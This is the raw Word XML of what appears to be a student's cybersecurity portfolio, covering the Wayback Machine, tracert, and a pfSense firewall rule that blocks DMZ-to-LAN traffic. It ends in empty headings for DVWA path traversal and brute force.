          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sr. Account Manager Finance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> working at</w:t>
      </w:r>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. His email address is: </w:t>
      </w:r>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linkedin.com/in/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sergeleclercq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and Twitter is: </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidRPr="009726D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://twitter.com/leclercqs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28225713" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="004578CB" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48733324" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WayBack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DD19C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="00000000" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidR="004E2155" w:rsidRPr="009726D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://archive.org/web/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E2155">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a website that offers archive for the websites and what they looked like throughout their existence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF05DF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF0F854" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607390D2" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C87AE1E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2D3B45"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s try to see how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2D3B45"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nu.nl looked like 10 years ago.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F88F9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00155E9B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A6644B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="003F6E5B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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A47AD3" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E718DAE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="25551A96" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:t>And this is how google.com looked like in 2007:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE9C62E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="16AC32D5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6726E2DA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="59D9BE5A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="116877E3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6FCBF63C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="7EB25387" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1A3B6C70" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="74BBCB0B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="63695456" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5AD56472" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:t>github.com in 2010:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B5742" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6C32C8B7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="734AFA01" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1E65FD5D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="49B59C25" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="57341C98" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0539D54E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="16B8BBE6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="480D20A0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3AA96B33" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="10824B89" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="71988F99" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="04C9CFB4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="4D31EE41" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0F8E007E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="55B5A32F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="344231DE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6A7FEBC9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command lists all the stops for a request to get to its destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48856B91" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C6295" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r w:rsidRPr="001428C5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001428C5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001428C5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> fhict.nl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDEBDDA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="001428C5" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>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Default="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5447CF5A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="61EA9812" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="7FD8C559" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3A17ED3B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="42F4BAB0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="41AACC00" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="50610293" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="34ACB4CB" w14:textId="10453543" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="77D319D0" w14:textId="14DC5CBA" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc115782528"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lesson 6.1 (</w:t>
      </w:r>
      <w:r w:rsidRPr="009F55FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Separation and Segmentation with Firewalls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="64DE0783" w14:textId="57B25013" w:rsidR="009F55FC" w:rsidRDefault="00266CEE" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In week 2, we set up a pfSense firewall and I assigned 3 interfaces to it, WAN, LAN, and DMZ. Every interface has a subnetwork and its own ip address. The picture below illustrates the important things about the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB6BFBE" w14:textId="2E96B105" w:rsidR="00266CEE" w:rsidRDefault="00266CEE" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="00266CEE" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The problem now is that there are no rules for the firewall. Therefore, all the connections are allowed which normally, is not what we want when we implement firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16BE64" w14:textId="79FE0FD7" w:rsidR="00266CEE" w:rsidRDefault="00266CEE" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this lesson, I will discuss the rules concept and how it talks to firewall to manage the traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B29834" w14:textId="3885C85A" w:rsidR="00266CEE" w:rsidRDefault="00266CEE" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F63E6C7" w14:textId="77777777" w:rsidR="00266CEE" w:rsidRDefault="00266CEE" w:rsidP="00266CEE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D07BA21" w14:textId="769A5F3B" w:rsidR="009F55FC" w:rsidRDefault="00266CEE" w:rsidP="00266CEE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Stateless &amp; Stateful </w:t>
      </w:r>
      <w:r w:rsidR="00632E8B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firewalls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EFBE68" w14:textId="5B592B27" w:rsidR="003125AD" w:rsidRDefault="00632E8B" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Stateful firewall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="003125AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eeps track of everywhere we go and create stages for it that we can analyze.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691AE334" w14:textId="06002CC2" w:rsidR="00266CEE" w:rsidRDefault="003125AD" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Stateless </w:t>
      </w:r>
      <w:r w:rsidR="00901855">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">firewall </w:t>
      </w:r>
      <w:r w:rsidR="00901855">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not inspect packets and is known with having fast performance. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1B00B" w14:textId="548B7E38" w:rsidR="00901855" w:rsidRDefault="00901855" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06761D96" w14:textId="72DCAF33" w:rsidR="00901855" w:rsidRDefault="00901855" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, when I ping from any device from the workstation to DMZ and vice versa, the ping is sent successfully, this is not what I personally want. I want to be able to ping from workstation to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DMZ</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> but I do not want the DMZ be able to reach the workstation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A35A2" w14:textId="2F28564E" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3983A8A2" w14:textId="0AE90E78" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DCCD3D" w14:textId="77777777" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAEACFC" w14:textId="622C8B1C" w:rsidR="00901855" w:rsidRDefault="00901855" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Let’s go add this rule: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E1AE86" w14:textId="71B74CB5" w:rsidR="00901855" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E97239D" w14:textId="0BEBE52C" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This tells firewall to BLOCK any connection from DMZ network going to LAN network which is exactly what I want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B0B7D7" w14:textId="4A898680" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F9BCB6" w14:textId="3FC94E49" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CD1AE4" w14:textId="5F8D6488" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E56AF17" w14:textId="6E87DE98" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7353DE" w14:textId="7C656627" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590CE5C5" w14:textId="5ED79D4B" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BA2136" w14:textId="4F98DBB9" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36323082" w14:textId="3E7BBF12" w:rsidR="00A07CC5" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5DF932" w14:textId="77777777" w:rsidR="00A07CC5" w:rsidRPr="00632E8B" w:rsidRDefault="00A07CC5" w:rsidP="00266CEE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45939474" w14:textId="49B2F916" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720A9DC0" w14:textId="1C52CA02" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1C80ED" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A09F18" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="0071361A" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0D044346" w14:textId="2925436E" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc115782529"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(BOK) Security Concepts (week 9-10)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1CD0EA28" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc115782530"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="15B3C039" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE20D52" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc115782531"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t xml:space="preserve">Path Traversal </w:t>
      </w:r>
      <w:r>
        <w:t>(2.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="1A25C8A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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc115782532"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Brute Force</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="6163AC9B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
